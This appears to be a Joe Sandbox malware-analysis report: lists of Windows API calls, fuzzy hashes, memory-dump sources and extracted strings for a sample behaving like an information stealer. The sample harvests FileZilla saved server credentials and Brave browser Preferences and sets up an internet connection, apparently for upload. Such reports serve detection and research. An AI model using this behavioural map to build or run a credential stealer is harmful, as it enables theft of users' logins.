                        • Instruction ID: 909aa127c2850f748a7abca37908e84536898dbc86ed4e15249c2a66916eb9ff
                        • Opcode Fuzzy Hash: 9758ccd3784f37b27e8d541b2e8e1d233ddbfb0b2d76ecf9ff9cc099027c2621
                        • Instruction Fuzzy Hash: 0992B071A10206AFEB24EF75DD89AAF77B9BF44304F44412AF809A7350DB78DC458BA4
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004518D2
                        • lstrlen.KERNEL32(\*.*), ref: 004518DD
                        • lstrcpy.KERNEL32(00000000,?), ref: 004518FF
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0045190B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451932
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00451947
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 00451967
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00451981
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004519BF
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004519F2
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451A1A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451A25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A4C
                        • lstrlen.KERNEL32(00471794), ref: 00451A5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A80
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451AB4
                        • lstrlen.KERNEL32(?), ref: 00451AC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451AE5
                        • lstrcat.KERNEL32(00000000,?), ref: 00451AF3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B19
                        • lstrlen.KERNEL32(01589128), ref: 00451B2F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B59
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451B64
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B8F
                        • lstrlen.KERNEL32(00471794), ref: 00451BA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451BC3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451BCF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451BF8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451C25
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451C30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451C57
                        • lstrlen.KERNEL32(00471794), ref: 00451C69
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451C8B
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451C97
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451CC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451CEF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451CFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D21
                        • lstrlen.KERNEL32(00471794), ref: 00451D33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D55
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451D61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DB9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451DC4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DED
                        • lstrlen.KERNEL32(00471794), ref: 00451E19
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451E36
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451E42
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451E68
                        • lstrlen.KERNEL32(0158D4D8), ref: 00451E7E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451EB2
                        • lstrlen.KERNEL32(00471794), ref: 00451EC6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451EE3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451EEF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451F15
                        • lstrlen.KERNEL32(0158D7F0), ref: 00451F2B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451F5F
                        • lstrlen.KERNEL32(00471794), ref: 00451F73
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451F90
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451F9C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451FC2
                        • lstrlen.KERNEL32(0157B978), ref: 00451FD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452000
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045200B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452036
                        • lstrlen.KERNEL32(00471794), ref: 00452048
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452067
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00452073
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452098
                        • lstrlen.KERNEL32(?), ref: 004520AC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004520D0
                        • lstrcat.KERNEL32(00000000,?), ref: 004520DE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452103
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045213F
                        • lstrlen.KERNEL32(0158D250), ref: 0045214E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452176
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00452181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                        • String ID: \*.*
                        • API String ID: 712834838-1173974218
                        • Opcode ID: 343279962de592b267ffdca21b160520903b186efda82014b6f0fc2d4833a66d
                        • Instruction ID: e541aa4871e13cc33f7360a0844c78aebc3499a414dc296ef87ecf9f9f4e5b9b
                        • Opcode Fuzzy Hash: 343279962de592b267ffdca21b160520903b186efda82014b6f0fc2d4833a66d
                        • Instruction Fuzzy Hash: EF62B6306116169BDB25AF74CD48AAFB6BAAF44705F44002AFC05A3362DB7CDD45CBA8
                        APIs
                        • wsprintfA.USER32 ref: 0045392C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00453943
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045396C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00453986
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004539BF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004539E7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004539F2
                        • lstrlen.KERNEL32(00471794), ref: 004539FD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453A1A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453A26
                        • lstrlen.KERNEL32(?), ref: 00453A33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453A53
                        • lstrcat.KERNEL32(00000000,?), ref: 00453A61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453A8A
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00453ACE
                        • lstrlen.KERNEL32(?), ref: 00453AD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B05
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453B10
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B36
                        • lstrlen.KERNEL32(00471794), ref: 00453B48
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B6A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453B76
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B9E
                        • lstrlen.KERNEL32(?), ref: 00453BB2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453BD2
                        • lstrcat.KERNEL32(00000000,?), ref: 00453BE0
                        • lstrlen.KERNEL32(015892A8), ref: 00453C0B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453C31
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453C3C
                        • lstrlen.KERNEL32(01589128), ref: 00453C5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453C84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453C8F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453CB7
                        • lstrlen.KERNEL32(00471794), ref: 00453CC9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453CE8
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453CF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453D1A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453D47
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453D52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453D79
                        • lstrlen.KERNEL32(00471794), ref: 00453D8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453DAD
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453DB9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453DE2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453E11
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453E1C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453E43
                        • lstrlen.KERNEL32(00471794), ref: 00453E55
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453E77
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453E83
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453EAC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453EDB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453EE6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453F0D
                        • lstrlen.KERNEL32(00471794), ref: 00453F1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453F41
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453F4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453F75
                        • lstrlen.KERNEL32(?), ref: 00453F89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453FA9
                        • lstrcat.KERNEL32(00000000,?), ref: 00453FB7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453FE0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045401F
                        • lstrlen.KERNEL32(0158D250), ref: 0045402E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454056
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454061
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045408A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004540CE
                        • lstrcat.KERNEL32(00000000), ref: 004540DB
                        • FindNextFileA.KERNEL32(00000000,?), ref: 004542D9
                        • FindClose.KERNEL32(00000000), ref: 004542E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 1006159827-1013718255
                        • Opcode ID: 7694c56e8f04256ed396d02040c7228c829b04b6b0884fe4d6fdf0b736f54498
                        • Instruction ID: 3e582fb2e78cef5fab092a411605593ca9c2cb44ee1a7912f5467c93443eb904
                        • Opcode Fuzzy Hash: 7694c56e8f04256ed396d02040c7228c829b04b6b0884fe4d6fdf0b736f54498
                        • Instruction Fuzzy Hash: DF621631A10216ABDB21AF75CD48AAFB3B9AF44346F40412AFC05A3351DB7CDD45CBA8
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456995
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004569C8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A29
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00456A34
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A5D
                        • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00456A77
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A99
                        • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00456AA5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456AD0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456B00
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00456B35
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456B9D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 313953988-555421843
                        • Opcode ID: e16dfdd1f9c6380493f652f94f538d089255856361f9e9871298c00be2e77f6c
                        • Instruction ID: dd45b959c05c38fa2962c1a8c8a3960113d4a609ae56fd6c8c29c45828d69b26
                        • Opcode Fuzzy Hash: e16dfdd1f9c6380493f652f94f538d089255856361f9e9871298c00be2e77f6c
                        • Instruction Fuzzy Hash: EE42E570A10201ABDB15ABB1DD49A6FBBBAAF04305F84542AFC05E7352DB7CDC45CB68
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DBEF
                        • lstrlen.KERNEL32(00474CA8), ref: 0044DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC17
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 0044DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC4C
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DC8F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0044DCD0
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0044DCF0
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0044DD0A
                        • lstrlen.KERNEL32(0046CFEC), ref: 0044DD1D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DD7B
                        • lstrlen.KERNEL32(00471794), ref: 0044DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDA3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DDAF
                        • lstrlen.KERNEL32(?), ref: 0044DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0044DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DE19
                        • lstrlen.KERNEL32(00471794), ref: 0044DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DE6F
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DE7B
                        • lstrlen.KERNEL32(01588F48), ref: 0044DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DEBB
                        • lstrlen.KERNEL32(00471794), ref: 0044DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DEE6
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DEF2
                        • lstrlen.KERNEL32(015891C8), ref: 0044DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFA5
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DFB1
                        • lstrlen.KERNEL32(01588F48), ref: 0044DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DFF4
                        • lstrlen.KERNEL32(00471794), ref: 0044DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E022
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044E02E
                        • lstrlen.KERNEL32(015891C8), ref: 0044E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0044E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0044E0E7
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E11F
                        • lstrlen.KERNEL32(0158D250), ref: 0044E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0044E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E19F
                        • lstrcat.KERNEL32(00000000), ref: 0044E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0044E1F9
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E22F
                        • lstrlen.KERNEL32(015892A8), ref: 0044E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E261
                        • lstrcat.KERNEL32(00000000,015892A8), ref: 0044E269
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0044E988
                        • FindClose.KERNEL32(00000000), ref: 0044E997
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                        • String ID: Brave$Preferences$\Brave\Preferences
                        • API String ID: 1346089424-1230934161
                        • Opcode ID: a5f5c37965a23e37b553250ef07e241eaf25c025ab73c82d4a4ab328026ff0cd
                        • Instruction ID: 17b3a1149374bb74a0c1a57735d2d196286a466ac91fd9e5d1bc71ea8c404d75
                        • Opcode Fuzzy Hash: a5f5c37965a23e37b553250ef07e241eaf25c025ab73c82d4a4ab328026ff0cd
                        • Instruction Fuzzy Hash: 5B527070A102069BEB25EF75DD89AAF77B9BF44304F44412AF809A7351DB78DC41CBA8
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004460FF
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446152
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446185
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004461B5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004461F0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446223
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00446233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 0406e270107e6eb6832b3dd77ac076b1273b9f18fbe0479995b1db8271a0fe4f
                        • Instruction ID: 7d12eb43b217a29205652a4f7fad68ad2011790113639ab8a91f54856dd7d3b8
                        • Opcode Fuzzy Hash: 0406e270107e6eb6832b3dd77ac076b1273b9f18fbe0479995b1db8271a0fe4f
                        • Instruction Fuzzy Hash: 0152A171A102159BEB21EFB5DC48AAFB7B9AF05304F45402AF805E7351DB78DC41CBA9
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456B9D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456BCD
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456BFD
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456C2F
                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00456C3C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00456C43
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00456C5A
                        • lstrlen.KERNEL32(00000000), ref: 00456C65
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456CA8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456CCF
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00456CE2
                        • lstrlen.KERNEL32(00000000), ref: 00456CED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456D30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456D57
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00456D6A
                        • lstrlen.KERNEL32(00000000), ref: 00456D75
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456DB8
